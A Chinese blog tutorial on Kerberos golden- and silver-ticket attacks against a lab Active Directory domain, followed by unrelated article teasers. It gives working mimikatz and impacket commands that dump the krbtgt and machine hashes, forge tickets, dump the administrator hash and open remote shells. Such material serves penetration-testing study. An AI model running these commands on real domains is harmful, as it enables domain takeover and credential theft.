PTT 票据传递攻击

embedded/2025/2/22 12:32:23/

黄金票据

原理:获取 krbtgt 的哈希后,使用此哈希能离线生成任意域用户的 tgt,域管理员的 tgt 就是黄金票据。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\krbtgt /csv" "exit"
​
58d7afab7f5f7ca0d4a6295ada00fd8e

# 生成黄金票据
python3 ticketer.py -domain-sid S-1-5-21-2992640285-1035252920-1077850616 -nthash 58d7afab7f5f7ca0d4a6295ada00fd8e -domain HACK.com administrator
# 导入票据
export KRB5CCNAME=administrator.ccache
# 导出 administrator 用户的哈希
​
python3 secretsdump.py -k -no-pass administrator@DC01.HACK.com -dc-ip 192.168.72.21 -just-dc-user HACK/administrator
​
# 访问域控 DC01
python3 smbexec.py -no-pass -k administrator@DC01.HACK.com -dc-ip 192.168.72.21
​
# 访问域内主机 win10
python3 smbexec.py -no-pass -k administrator@WIN10-02.HACK.com -dc-ip 192.168.72.21 -codec gbk


mimikatz.exe
#生成并导入黄金票据到当前内存中
​
kerberos::golden /user:administrator /domain:HACK.com /sid:S-1-5-21-2992640285-1035252920-1077850616 /krbtgt:58d7afab7f5f7ca0d4a6295ada00fd8e /ptt
​
#验证是否成功,导出指定用户哈希
lsadump::dcsync /domain:HACK.com /all /csv

白银票据

原理:获取某个服务账户的哈希后,使用普通域用户访问此服务后,使用获得的哈希解密 st 服务票据,然后给 pac 添加一个高权限用户,并使用此哈希伪造 PAC_SERVER_CHECKSUM 签名。而 PAC_PRIVSVR_CHECKSUM 签名伪造需要 krbtgt 的哈希,但是此签名可选且默认不开启,直接忽视。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:DC01$ /csv" "exit"
​
32538b59408163c76f5439225907c28e

#生成白银票据
python3 ticketer.py -domain-sid S-1-5-21-2992640285-1035252920-1077850616 -nthash 32538b59408163c76f5439225907c28e -spn cifs/DC01.HACK.com -domain HACK.com administrator
​
#导入票据
export KRB5CCNAME=administrator.ccache
​
#导出 administrator 用户的哈希
python3 secretsdump.py -k -no-pass administrator@DC01.HACK.com -dc-ip 192.168.72.21 -just-dc-user HACK/administrator
​
#访问域控 DC01
python3 smbexec.py -no-pass -k administrator@DC01.HACK.com -dc-ip 192.168.72.21


http://www.ppmy.cn/embedded/164325.html

相关文章

tidb实时同步到mysql

客户要求实时同步表的数据到mysql,但这个表在tidb。 测试直接通过tidb cdc写入到mysql,有些字段是null,所以中间加了一个kafka实现 客户库中创建表 CREATE TABLE tb_1 (id bigint primary key,cid bigint,gid bigint,fee DECIMAL(10,2),cre…

双非一本电子信息专业自学嵌入式,学完 Linux 后咋走?单片机 FreeRTOS 要补吗?

今天给大家分享的是一位粉丝的提问,双非一本电子信息专业自学嵌入式,学完 Linux 后咋走?单片机 & FreeRTOS 要补吗? 接下来把粉丝的具体提问和我的回复分享给大家,希望也能给一些类似情况的小伙伴一些启发和帮助。…

蓝桥杯 Day6 贪心

贪心 1.要点 2.例题 2022 砍竹子 学习: 1.模拟砍竹子砍到高度1&#xff0c;不过要记录过程高度&#xff0c;以便后续判断是否存在(想到集合哈希),然后外面嵌套数组(活用数据结构)resize给大小 vector<unordered_set<ll>> hs;//记录第i根竹子下降到1过程中的每…

Powershell Install deepseek

前言 deepseekAI助手。它具有聊天机器人功能&#xff0c;可以与用户进行自然语言交互&#xff0c;回答问题、提供建议和帮助解决问题。DeepSeek 的特点包括&#xff1a; 强大的语言理解能力&#xff1a;能够理解和生成自然语言&#xff0c;与用户进行流畅的对话。多领域知识&…

量子比特的实现与优化技术:解密量子计算的核心

量子比特的实现与优化技术:解密量子计算的核心 大家好,我是Echo_Wish,今天我们来聊聊量子计算中的一个核心概念——量子比特(qubit)的实现与优化技术。量子比特作为量子计算的基本单位,与经典计算中的比特有着本质的不同。本文将深入探讨量子比特的实现方法及其优化技术…

1. Linux下 MySQL 的详细安装与使用

1. Linux下 MySQL 的详细安装与使用 文章目录 1. Linux下 MySQL 的详细安装与使用1. Linux 下安装 MySQL8.0 的详细安装步骤&#xff1a;2. Linxu 当中的MySQL 设置远程登录3. 最后&#xff1a; 1. Linux 下安装 MySQL8.0 的详细安装步骤&#xff1a; 查看是否安装过MySQL&…

【小白学AI系列】NLP 核心知识点(八)多头自注意力机制

文章目录 **多头自注意力机制&#xff08;Multi-Head Self-Attention&#xff09;****核心概念** **1. 自注意力机制&#xff08;Self-Attention&#xff09;****2. 多头机制&#xff08;Multi-Head Attention&#xff09;****3. 为什么要用多头注意力机制&#xff1f;****4. 公…

AI助力下的PPT革命:DeepSeek 与Kimi的高效创作实践

清华大学出品《DeepSeek&#xff1a;从入门到精通》分享 在忙碌的职场中&#xff0c;制作一份高质量的PPT往往需要投入大量时间和精力&#xff0c;尤其是在临近截止日期时。今天&#xff0c;我们将探索如何借助 AI 工具 —— DeepSeek 和 Kimi —— 让 PPT 制作变得既快捷又高…